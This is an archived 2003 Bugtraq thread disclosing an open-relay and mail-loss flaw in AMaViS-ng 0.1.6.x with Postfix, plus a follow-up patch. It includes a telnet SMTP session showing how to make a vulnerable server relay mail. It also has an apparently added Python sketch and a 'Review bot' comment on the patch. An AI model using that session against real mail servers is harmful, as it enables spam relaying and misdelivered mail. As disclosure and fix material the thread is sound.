98077 2003-04-08 18:38 /62 lines/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Imported: 2003-04-08 18:38 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4413>
Subject: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
------------------------------------------------------------
Hi everyone -

with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3;
0.1.4.x is not vulnerable), all email gets forwarded to the address
specified by the "To:" header line, ignoring the real recipient
given via "RCPT TO:".

Possible exploit:
--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX@domainX.tld
(250 ok)
rcpt to:userY@domain.tld
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX@domainX.tld
To: userZ@domainZ.tld
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--

Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng
0.1.6.x installed must accept emails for userY@domain.tld.

What it does: userX@domainX.tld is sending an email to
userY@domain.tld. The header of this email contains "To:
userZ@domain.tld". AMaViS-ng seems to parse the header and forwards
the email to userZ@domain.tld. userY@domain.tld does not get this
email. As many postfix users trust their localhost (no restrictions
for localhost), it is possible to relay an email or a spam mail this
way.

configuration files (relevant parts):

# $postfix/master.cf
smtp inet n - n - - smtpd -o content_filter=filter:
filter unix - n n - - pipe
  flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf

# $amavis-ng/amavis.conf
[global]
mail-transfer-agent = Postfix

[Postfix]
postfix = /usr/sbin/sendmail
args = -i -f
# end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,

Phil Cyc
(98077) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Rewrapped)
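The advisory's two configuration fragments describe the whole data path: master.cf hands the envelope to the filter as `${sender} -- ${recipient}`, and the filter has to carry exactly that envelope into its `sendmail -i -f` reinjection, or the To: header written by the remote sender decides where the mail goes. The Python sketch below is an added example, not AMaViS-ng's own (Perl) code; it assumes the master.cf and amavis.conf lines quoted above, and the function names, the address shape check and the sample argv are this example's own.

```python
"""Added example, not AMaViS-ng's (Perl) code: the envelope handling a
Postfix pipe(8) content filter needs so that reinjection follows the
envelope Postfix handed it, never the To: header the remote sender wrote.

Assumed from the advisory's configuration: the filter is started as
`amavis ${sender} -- ${recipient}` and reinjects via
`/usr/sbin/sendmail -i -f`.  Function names, the address shape check and
the sample argv below are this example's own."""

import re
import subprocess
from dataclasses import dataclass, field
from typing import List, Sequence

SENDMAIL = "/usr/sbin/sendmail"      # amavis.conf: postfix = /usr/sbin/sendmail
SENDMAIL_ARGS = ("-i", "-f")         # amavis.conf: args = -i -f
NULL_SENDER = "<>"                   # spelling Postfix.pm uses for the null sender
OPTION_TOKENS = ("-f", "-d", "--")   # argv tokens that are never addresses

# Loose shape check (assumption of this example): exactly one '@', no
# whitespace or angle brackets.  Postfix already validated the envelope; this
# only stops a stray option token or empty string from becoming a recipient.
_ADDRESS_RE = re.compile(r"^[^\s@<>]+@[^\s@<>]+$")


@dataclass
class Envelope:
    sender: str
    recipients: List[str] = field(default_factory=list)


def parse_filter_argv(argv: Sequence[str]) -> Envelope:
    """Parse `[-f] sender [-d|--] recipient...` as master.cf hands it over.

    Compared with the loop the advisory reports against: each argument is
    compared directly (not via an unrelated variable), `--` is never taken
    as a recipient, and an empty recipient list is an error instead of
    something passed on to sendmail.
    """
    args = list(argv)
    if args and args[0] == "-f":
        args.pop(0)
    if not args:
        raise ValueError("no envelope sender on the command line")
    sender = args.pop(0)
    if sender in ("", NULL_SENDER):  # old pipe(8) gives "" for the null sender
        sender = NULL_SENDER
    elif not _ADDRESS_RE.match(sender):
        raise ValueError(f"malformed envelope sender: {sender!r}")
    recipients = [a for a in args if a not in OPTION_TOKENS]
    bad = [r for r in recipients if not _ADDRESS_RE.match(r)]
    if bad:
        raise ValueError(f"malformed envelope recipient(s): {bad!r}")
    if not recipients:
        raise ValueError("no envelope recipients on the command line")
    return Envelope(sender, recipients)


def build_reinject_command(env: Envelope) -> List[str]:
    """argv for handing the scanned message back to Postfix.

    `-f` carries the envelope sender, `--` (getopt's end-of-options marker)
    keeps a recipient beginning with '-' from being read as an option, and
    every envelope recipient is listed explicitly: sendmail is never left
    to work out recipients from the message it reads on stdin.
    """
    if not env.recipients:
        raise ValueError("refusing to reinject without explicit recipients")
    return [SENDMAIL, *SENDMAIL_ARGS, env.sender, "--", *env.recipients]


def reinject(env: Envelope, message: bytes) -> int:
    """Run sendmail with the message on stdin; returns its exit status."""
    return subprocess.run(build_reinject_command(env), input=message).returncode


def demo() -> List[str]:
    """The advisory's session: RCPT TO userY@domain.tld, header To:
    userZ@domainZ.tld.  Only the envelope ever reaches the command line."""
    env = parse_filter_argv(["userX@domainX.tld", "--", "userY@domain.tld"])
    return build_reinject_command(env)


if __name__ == "__main__":
    print(" ".join(demo()))
```

Two things to check against the Postfix version actually in use: the empty-argument convention for the null sender is what the page's Perl code expects, while recent pipe(8) substitutes its null_sender attribute (MAILER-DAEMON by default) into `${sender}` instead; and whatever the filter does, reinjection from localhost bypasses the smtpd restrictions applied at the front, which is why an envelope mix-up in the filter turns straight into a relay.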
98298 2003-04-10 06:46 /12 lines/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Imported: 2003-04-10 06:46 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4437>
Comment on text 98077 by Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Subject: Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
------------------------------------------------------------
Hi -

As long as the problem is not fixed by the AMaViS-ng maintainers,
this patch could be helpful.

I took the relevant part from the version 0.1.4.1 source. This patch
(attachment) applies to 0.1.6.3.

Kind regards,

Phil Cyc
(98298) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Rewrapped)
Attachment (text/x-diff) in text 98299
98299 2003-04-10 06:46 /32 lines/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Attachment filename: "postfix.patch"
Imported: 2003-04-10 06:46 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4438>
Attachment (text/plain) to text 98298
Subject: Attachment (postfix.patch) to: Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
------------------------------------------------------------
diff -Nru amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm
--- amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm	Tue Mar 18 00:04:21 2003
+++ amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm	Tue Apr  8 23:28:09 2003
@@ -112,22 +112,11 @@
 
   writelog($args,LOG_DEBUG, "Called as amavis ".join(' ',@ARGV));
 
-  while (shift @ARGV) {
-    /^-f$/ && next; # ignore "-f"
-    /^-d$/ && next; # ignore "-d"
-    s/^(.*)$/$1/; # untaint sender or recipient
-    if (not defined $$args{'sender'}) {
-      if (/^$/) {
-	$$args{'sender'} = "<>";
-      }
-      else {
-	$$args{'sender'} = $_;
-      }
-    }
-    else {
-      push @{$$args{'recipients'}}, $_;
-    }
-  }
+  shift @ARGV if $ARGV[0] eq "-f";
+  $$args{'sender'} = shift @ARGV;
+  $$args{'sender'} = "<>" if (!$$args{'sender'});
+  shift @ARGV if $ARGV[0] eq "-d";
+  push @{$$args{'recipients'}}, @ARGV;
 
   # Message file has been written, reset file pointer and put it into
   # the record.
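Review bot: the replacement lines drop the `s/^(.*)$/$1/; # untaint sender or recipient` step the removed loop applied to every argument, so under taint checking the sender and the recipients pushed by `push @{$$args{'recipients'}}, @ARGV;` stay tainted when they reach the sendmail call; untaint them as the old loop did before they are handed on. Two smaller points on the same lines: `shift @ARGV if $ARGV[0] eq "-f";` compares an undefined `$ARGV[0]` when the filter is started without arguments (guard it with `@ARGV &&`), and since master.cf starts the filter as `${sender} -- ${recipient}`, a `--` still present in @ARGV here would be pushed as a recipient, because only `-f` and `-d` are skipped; skip `--` the same way unless earlier option parsing is known to have consumed it.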
(98299) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Rewrapped)